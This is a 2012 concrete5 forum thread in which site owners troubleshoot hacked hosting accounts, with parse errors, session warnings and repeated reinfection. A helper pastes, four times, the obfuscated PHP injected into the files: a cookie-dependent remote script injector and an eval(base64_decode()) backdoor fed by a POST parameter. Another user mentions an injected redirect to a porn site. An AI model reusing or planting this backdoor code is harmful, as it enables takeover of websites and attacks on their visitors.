I got hacked (I think)/parse error
Permalink 1 user found helpful
Hi all,
I have other sites which got hacked unfortunately.
Now when I log in to my C5 site I get this error before I reach the first logged in page -
Parse error: syntax error, unexpected $end in /home/mydomain/public_html/updates/concrete5.5.2.1/concrete/models/attribute/types/default/controller.php on line 69
line 69 actually reads as
public function search() {
Has this been hacked?
Everything was fine when I first updated.
Thanks in advance for any assistance you can offer,
regards,
Neil
I have other sites which got hacked unfortunately.
Now when I log in to my C5 site I get this error before I reach the first logged in page -
Parse error: syntax error, unexpected $end in /home/mydomain/public_html/updates/concrete5.5.2.1/concrete/models/attribute/types/default/controller.php on line 69
line 69 actually reads as
public function search() {
Has this been hacked?
Everything was fine when I first updated.
Thanks in advance for any assistance you can offer,
regards,
Neil
Hi,
thanks so much for the help.
I've attached the file.
There are other errors too, go to
http://www.skywalkerdigital.com
I've changed nothing at all recently but another site of mine on an addon domain got hacked (malicious script at the domain root, it was 301'd at the time) and this is when the error occurred.
My domain host support blame a wordpress plugin, Wassup, on a 3rd domain!
They suggest reinstalling Concrete5.
Thanks again,
Neil
thanks so much for the help.
I've attached the file.
There are other errors too, go to
http://www.skywalkerdigital.com
I've changed nothing at all recently but another site of mine on an addon domain got hacked (malicious script at the domain root, it was 301'd at the time) and this is when the error occurred.
My domain host support blame a wordpress plugin, Wassup, on a 3rd domain!
They suggest reinstalling Concrete5.
Thanks again,
Neil
This is definitely funky:
Probably an injection in all your files.
$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;} $s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;} $s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;} $s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}
Probably an injection in all your files.
Thanks for the reply.
It's all looking really bad!
My htaccess files were corrupt, they're now blank but the server is 500 erroring now...
Dang!
It's all looking really bad!
My htaccess files were corrupt, they're now blank but the server is 500 erroring now...
Dang!
Before you delete it, can you send a copy of your whole site to me? Im curious how this hacker came in. (ofcourse you can delete te config files and other sensitive files). Ill look what its doing and how to prevent this (bugfixing).
Hi Neil,
As adajad said, you have to find all your executable file like .php & remove the funky code. If it is a running site, then it is the only way to get it solve. Otherwise have a fresh install.
Citytech
As adajad said, you have to find all your executable file like .php & remove the funky code. If it is a running site, then it is the only way to get it solve. Otherwise have a fresh install.
Citytech
Thanks for the comments guys, have a good day!
mmm..
Reinstalled everything but still getting errors on login page
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/skywalk2/public_html/config/site.php:1) in /home/skywalk2/public_html/updates/concrete5.5.2.1/concrete/startup/session.php on line 32
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/skywalk2/public_html/config/site.php:1) in /home/skywalk2/public_html/updates/concrete5.5.2.1/concrete/startup/session.php on line 32
Warning: Cannot modify header information - headers already sent by (output started at /home/skywalk2/public_html/config/site.php:1) in /home/skywalk2/public_html/updates/concrete5.5.2.1/concrete/libraries/view.php on line 843
Cache, cookies cleared, same thing... :(
Any ideas?
Thanks a lot!
Reinstalled everything but still getting errors on login page
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/skywalk2/public_html/config/site.php:1) in /home/skywalk2/public_html/updates/concrete5.5.2.1/concrete/startup/session.php on line 32
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/skywalk2/public_html/config/site.php:1) in /home/skywalk2/public_html/updates/concrete5.5.2.1/concrete/startup/session.php on line 32
Warning: Cannot modify header information - headers already sent by (output started at /home/skywalk2/public_html/config/site.php:1) in /home/skywalk2/public_html/updates/concrete5.5.2.1/concrete/libraries/view.php on line 843
Cache, cookies cleared, same thing... :(
Any ideas?
Thanks a lot!
It looks like the same code was injected again, as its trying to send cookies.
Hi Vinzent,
thanks for the help.
In layman's terms that means I should reinstall I suppose?
Anything else I should do?
Thanks a lot,
Neil
> Date: Sat, 5 May 2012 04:17:24 -0400
> Subject: I got hacked (I think)/parse error : Installation Help
> From: discussions@concretecms.com
> To: neilzinho@hotmail.com
if you haven't already reinstalled C5, you can do that.
But if you have reinstalled it, something is injecting the files everytime you install C5.
If you dont mind, could you send me your current concrete5 folder? so i can research where this comes from?
But if you have reinstalled it, something is injecting the files everytime you install C5.
If you dont mind, could you send me your current concrete5 folder? so i can research where this comes from?
Hi,
I set up a new empty database and reinstalled but the Russians are still in there :(
What do you need - ftp access, admin login, cpanel access?
Thanks,
Neil
> Date: Sat, 5 May 2012 07:50:52 -0400
> Subject: I got hacked (I think)/parse error : Installation Help
> From: discussions@concretecms.com
> To: neilzinho@hotmail.com
The russians? Haha. You should change all the passwords first. And if you trust me (i wont edit anything, promise), ftp access would be nice so i can download your whole site and do some research. Also, do you have log files?
You can PM me.
-----Oorspronkelijk bericht-----
Van: concrete5 Community [mailto:discussions@concretecms.com]
Verzonden: zaterdag 5 mei 2012 15:15
Aan: vincentvh@live.nl
Onderwerp: I got hacked (I think)/parse error : Installation Help
You can PM me.
-----Oorspronkelijk bericht-----
Van: concrete5 Community [mailto:discussions@concretecms.com]
Verzonden: zaterdag 5 mei 2012 15:15
Aan: vincentvh@live.nl
Onderwerp: I got hacked (I think)/parse error : Installation Help
Hi
The Russians have invaded one of my clients too. All my php files start with a lot of "$s=substr(8,1);foreach(array.... "
Then in the HTML header tag I get encoded (unescape) redirecting to a porn site. "http://pornvvid.com/secure/?4"
I am 99% sure it is a hacking script running somewhere on the site. my htaccess file was hacked and i removed it. I know, I know. I will replace it when I get a chance. I am also 99% sure that the hackers have the FTP login details. How else could they get in. Only way to block injection is to 555 the files which makes editing a pain. I can send copies of my infected files if it will help you.
I am not using Concrete because this specific site is on a shared server. So I dont have PHP config access.
The Russians have invaded one of my clients too. All my php files start with a lot of "$s=substr(8,1);foreach(array.... "
Then in the HTML header tag I get encoded (unescape) redirecting to a porn site. "http://pornvvid.com/secure/?4"
I am 99% sure it is a hacking script running somewhere on the site. my htaccess file was hacked and i removed it. I know, I know. I will replace it when I get a chance. I am also 99% sure that the hackers have the FTP login details. How else could they get in. Only way to block injection is to 555 the files which makes editing a pain. I can send copies of my infected files if it will help you.
I am not using Concrete because this specific site is on a shared server. So I dont have PHP config access.
Citytech